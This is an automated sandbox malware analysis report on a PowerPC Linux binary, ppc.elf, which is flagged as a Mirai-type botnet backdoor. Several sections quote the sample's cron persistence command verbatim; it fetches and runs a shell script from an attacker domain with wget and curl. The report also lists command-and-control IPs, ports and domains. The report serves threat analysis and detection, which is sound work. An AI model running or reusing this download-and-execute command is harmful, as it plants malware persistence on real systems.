Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
ppc.elf

Overview

General Information

Sample name:ppc.elf
Analysis ID:1541143
MD5:0b7d29b9cd26113d2540ce43f07a2043
SHA1:be337137f850b55d14a9b547d890238d478dc5fa
SHA256:a782bcfea22e233256ec6f536cc5f06d007dac34b1bdb37f56b75913cc9013b3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1541143
Start date and time:2024-10-24 14:03:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 11s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ppc.elf
Detection:MAL
Classification:mal56.troj.linELF@0/1@5/0
  • VT rate limit hit for: ppc.elf
Command:/tmp/ppc.elf
PID:6211
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • ppc.elf (PID: 6211, Parent: 6130, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/ppc.elf
    • ppc.elf New Fork (PID: 6213, Parent: 6211)
    • sh (PID: 6213, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6217, Parent: 6213)
        • sh New Fork (PID: 6219, Parent: 6217)
        • crontab (PID: 6219, Parent: 6217, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6218, Parent: 6213)
      • crontab (PID: 6218, Parent: 6213, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • ppc.elf New Fork (PID: 6220, Parent: 6211)
      • ppc.elf New Fork (PID: 6275, Parent: 6220)
      • ppc.elf New Fork (PID: 6277, Parent: 6220)
    • ppc.elf New Fork (PID: 6221, Parent: 6211)
    • ppc.elf New Fork (PID: 6232, Parent: 6211)
  • dash New Fork (PID: 6367, Parent: 4331)
  • rm (PID: 6367, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7
  • dash New Fork (PID: 6368, Parent: 4331)
  • rm (PID: 6368, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ppc.elfReversingLabs: Detection: 18%
Source: tmp.gfYg0o.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: global trafficTCP traffic: 192.168.2.23:53722 -> 81.29.149.178:9896
Source: global trafficTCP traffic: 192.168.2.23:40708 -> 194.87.198.29:17173
Source: global trafficTCP traffic: 192.168.2.23:37896 -> 91.149.218.232:15905
Source: /tmp/ppc.elf (PID: 6211)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.gfYg0o.19.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/ppc.elf (PID: 6275)SIGKILL sent: pid: 6367, result: no such processJump to behavior
Source: /tmp/ppc.elf (PID: 6221)SIGKILL sent: pid: 6367, result: successfulJump to behavior
Source: /tmp/ppc.elf (PID: 6221)SIGKILL sent: pid: 6368, result: successfulJump to behavior
Source: classification engineClassification label: mal56.troj.linELF@0/1@5/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6219)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6218)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6218)File: /var/spool/cron/crontabs/tmp.gfYg0oJump to behavior
Source: /usr/bin/crontab (PID: 6218)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6351/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6373/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6350/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6372/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6353/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6375/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6275/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6352/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6374/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6355/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6377/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6277/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6354/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/4331/cmdlineJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6376/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6357/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6038/cmdlineJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6379/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6356/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6378/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6371/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6370/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6348/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6347/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6369/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6349/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6362/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6384/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6361/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6383/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6386/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6385/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6388/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6387/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6346/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6368/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6345/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6367/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6380/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6360/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6382/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6381/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6359/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6221)File opened: /proc/6358/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6351/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6373/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6350/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6372/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6353/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6375/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6352/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6374/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6355/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6377/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6354/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/4331/cmdlineJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/4331/cmdlineJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6376/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6357/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6038/cmdlineJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6379/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6356/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6378/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6371/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6370/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6348/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6347/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6369/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6349/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6362/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6384/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6361/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6383/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6386/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6385/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6388/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6387/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6346/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6368/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6345/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6367/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6380/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6360/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6382/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6381/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6359/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6275)File opened: /proc/6358/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6213)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /usr/bin/dash (PID: 6367)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7Jump to behavior
Source: /usr/bin/dash (PID: 6368)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/ppc.elf (PID: 6211)Queries kernel information via 'uname': Jump to behavior
Source: ppc.elf, 6211.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmp, ppc.elf, 6220.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmpBinary or memory string: |7x86_64/usr/bin/qemu-ppc/tmp/ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ppc.elf
Source: ppc.elf, 6211.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmp, ppc.elf, 6220.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
Source: ppc.elf, 6211.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmp, ppc.elf, 6220.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
Source: ppc.elf, 6211.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmp, ppc.elf, 6220.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541143 Sample: ppc.elf Startdate: 24/10/2024 Architecture: LINUX Score: 56 38 194.87.198.29, 17173, 40708 LOGOL-ASRU Russian Federation 2->38 40 109.202.202.202, 80 INIT7CH Switzerland 2->40 42 6 other IPs or domains 2->42 46 Multi AV Scanner detection for submitted file 2->46 9 ppc.elf 2->9         started        11 dash rm 2->11         started        13 dash rm 2->13         started        signatures3 process4 process5 15 ppc.elf sh 9->15         started        17 ppc.elf 9->17         started        19 ppc.elf 9->19         started        21 ppc.elf 9->21         started        process6 23 sh crontab 15->23         started        27 sh 15->27         started        29 ppc.elf 17->29         started        31 ppc.elf 17->31         started        file7 36 /var/spool/cron/crontabs/tmp.gfYg0o, Unknown 23->36 dropped 48 Sample tries to persist itself using cron 23->48 50 Executes the "crontab" command typically for achieving persistence 23->50 33 sh crontab 27->33         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 33->44
SourceDetectionScannerLabelLink
ppc.elf18%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
88.151.195.22
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.gfYg0o.19.drfalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      54.171.230.55
      unknownUnited States
      16509AMAZON-02USfalse
      194.87.198.29
      unknownRussian Federation
      49352LOGOL-ASRUfalse
      81.29.149.178
      unknownSwitzerland
      39616COMUNICA_IT_SERVICESCHfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.149.218.232
      unknownPoland
      198401GECKONET-ASPLfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      54.171.230.55bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
        ppc.elfGet hashmaliciousMirai, MoobotBrowse
          na.elfGet hashmaliciousUnknownBrowse
            garm6.elfGet hashmaliciousMiraiBrowse
              .i.elfGet hashmaliciousUnknownBrowse
                na.elfGet hashmaliciousUnknownBrowse
                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                    iLoYpTmnHz.elfGet hashmaliciousUnknownBrowse
                      zOSCVTuLxE.elfGet hashmaliciousGafgyt, MiraiBrowse
                        rondo.i586.elfGet hashmaliciousUnknownBrowse
                          194.87.198.29mips.elfGet hashmaliciousUnknownBrowse
                            arm5.elfGet hashmaliciousUnknownBrowse
                              81.29.149.178mips.elfGet hashmaliciousUnknownBrowse
                                arm5.elfGet hashmaliciousUnknownBrowse
                                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                  91.149.218.232x86.elfGet hashmaliciousUnknownBrowse
                                    91.189.91.43mozi.m.elfGet hashmaliciousUnknownBrowse
                                      tftp.elfGet hashmaliciousUnknownBrowse
                                        .i.elfGet hashmaliciousUnknownBrowse
                                          i486.elfGet hashmaliciousUnknownBrowse
                                            boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                              nsharm6.elfGet hashmaliciousMiraiBrowse
                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                  BoM00gWx1d.elfGet hashmaliciousUnknownBrowse
                                                    hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        kingstonwikkerink.dynmips.elfGet hashmaliciousUnknownBrowse
                                                        • 88.151.195.22
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 88.151.195.22
                                                        arm4.elfGet hashmaliciousUnknownBrowse
                                                        • 88.151.195.22
                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                        • 185.82.200.181
                                                        na.elfGet hashmaliciousMiraiBrowse
                                                        • 27.102.115.180
                                                        na.elfGet hashmaliciousMiraiBrowse
                                                        • 158.51.124.230
                                                        na.elfGet hashmaliciousMiraiBrowse
                                                        • 45.144.172.147
                                                        na.elfGet hashmaliciousMiraiBrowse
                                                        • 45.144.172.147
                                                        na.elfGet hashmaliciousMiraiBrowse
                                                        • 87.120.166.4
                                                        na.elfGet hashmaliciousMiraiBrowse
                                                        • 46.29.161.108
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        COMUNICA_IT_SERVICESCHCircular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 81.29.149.252
                                                        Monetary_002993034958293.jsGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.252
                                                        RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 81.29.149.252
                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.178
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.178
                                                        zvit_04_09_2024.htmlGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.119
                                                        AMAZON-02USattachment(1).emlGet hashmaliciousUnknownBrowse
                                                        • 54.200.229.67
                                                        https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                                                        • 44.236.119.144
                                                        PO 635614 635613_CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.33.187.120
                                                        powerpc.elfGet hashmaliciousUnknownBrowse
                                                        • 54.189.236.91
                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                        • 18.132.138.58
                                                        mm.exeGet hashmaliciousUnknownBrowse
                                                        • 3.111.160.216
                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                        • 15.207.67.212
                                                        bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 54.171.230.55
                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                        • 13.123.23.92
                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 3.13.12.6
                                                        LOGOL-ASRUmips.elfGet hashmaliciousUnknownBrowse
                                                        • 194.87.198.29
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 194.87.198.29
                                                        https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metalGet hashmaliciousUnknownBrowse
                                                        • 176.99.5.94
                                                        IISz6QDXkY.elfGet hashmaliciousMiraiBrowse
                                                        • 176.99.9.164
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 194.87.191.171
                                                        ilwj2dfs9x.elfGet hashmaliciousMiraiBrowse
                                                        • 176.99.9.154
                                                        pw4LXxa9IX.elfGet hashmaliciousMiraiBrowse
                                                        • 176.99.9.130
                                                        dXdP65yVxR.elfGet hashmaliciousMiraiBrowse
                                                        • 176.99.9.157
                                                        http://www.nnov.org/common/link.php?redir=http://linkedin.com+accounts%3Dsecurelogin+settings%3Dprivate@DOMs.biqscore.com/r/?userid=bGVlLmdpYnNvbkBzb3V0aHNpZGUuY29tGet hashmaliciousUnknownBrowse
                                                        • 188.93.208.56
                                                        x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 176.99.9.154
                                                        No context
                                                        No context
                                                        Process:/usr/bin/crontab
                                                        File Type:Unknown
                                                        Category:dropped
                                                        Size (bytes):306
                                                        Entropy (8bit):5.154442544229458
                                                        Encrypted:false
                                                        SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLYoi6vZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKw:8QjHig8UHMeHLUHYC+GABjnOGAFkz
                                                        MD5:9874B244F4851142CC03F2536A42EA33
                                                        SHA1:E8893112F36E78BAF39956B4A12A9BBE21FF1A33
                                                        SHA-256:7532497F4508720163DED4A1AC90D8203A976CC7817FD2A13FB0FE48509FACA2
                                                        SHA-512:05377C0E2819B4956D2386505D687DC1FFBCF74123EA1CD95590F21479B7BE2F5C140BA029D5217BF6831727251E5C7F6B46F0F73F2522E94548ACA4BB1CE611
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Oct 24 07:03:48 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                        File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                        Entropy (8bit):6.262840640121452
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:ppc.elf
                                                        File size:77'608 bytes
                                                        MD5:0b7d29b9cd26113d2540ce43f07a2043
                                                        SHA1:be337137f850b55d14a9b547d890238d478dc5fa
                                                        SHA256:a782bcfea22e233256ec6f536cc5f06d007dac34b1bdb37f56b75913cc9013b3
                                                        SHA512:28086d327396e62cb07b1995e854ab86947f8f4435d4386770ca577f6bc098e07399841fe298f1f2c5d5d642b702babe0702cf02ef4693d482a84f97a096be32
                                                        SSDEEP:1536:uoQ4z72gxzc7xeMthFmldGdkqer3W1qI4Zte9Wq0CwER1:u27Hq1tqy0r3W4I4aLB1
                                                        TLSH:5B734B42730C0947D1A75DF03A3F27D093BEA99121E4FA84695FAB4A81B2E335586FCD
                                                        File Content Preview:.ELF...........................4..-H.....4. ...(......................)\..)\..............)`..)`..)`......T.........dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........-|..../...@..\?.....)|.+../...A..$8...})....)|N..

                                                        ELF header

                                                        Class:ELF32
                                                        Data:2's complement, big endian
                                                        Version:1 (current)
                                                        Machine:PowerPC
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:UNIX - System V
                                                        ABI Version:0
                                                        Entry Point Address:0x100001f0
                                                        Flags:0x0
                                                        ELF Header Size:52
                                                        Program Header Offset:52
                                                        Program Header Size:32
                                                        Number of Program Headers:3
                                                        Section Header Offset:77128
                                                        Section Header Size:40
                                                        Number of Section Headers:12
                                                        Header String Table Index:11
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .initPROGBITS0x100000940x940x240x00x6AX004
                                                        .textPROGBITS0x100000b80xb80x10e3c0x00x6AX004
                                                        .finiPROGBITS0x10010ef40x10ef40x200x00x6AX004
                                                        .rodataPROGBITS0x10010f180x10f180x1a440x00x2A008
                                                        .ctorsPROGBITS0x100229600x129600x80x00x3WA004
                                                        .dtorsPROGBITS0x100229680x129680x80x00x3WA004
                                                        .dataPROGBITS0x100229780x129780x3440x00x3WA008
                                                        .sdataPROGBITS0x10022cbc0x12cbc0x400x00x3WA004
                                                        .sbssNOBITS0x10022cfc0x12cfc0x800x00x3WA004
                                                        .bssNOBITS0x10022d7c0x12cfc0x508c0x00x3WA004
                                                        .shstrtabSTRTAB0x00x12cfc0x4b0x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x100000000x100000000x1295c0x1295c6.30220x5R E0x10000.init .text .fini .rodata
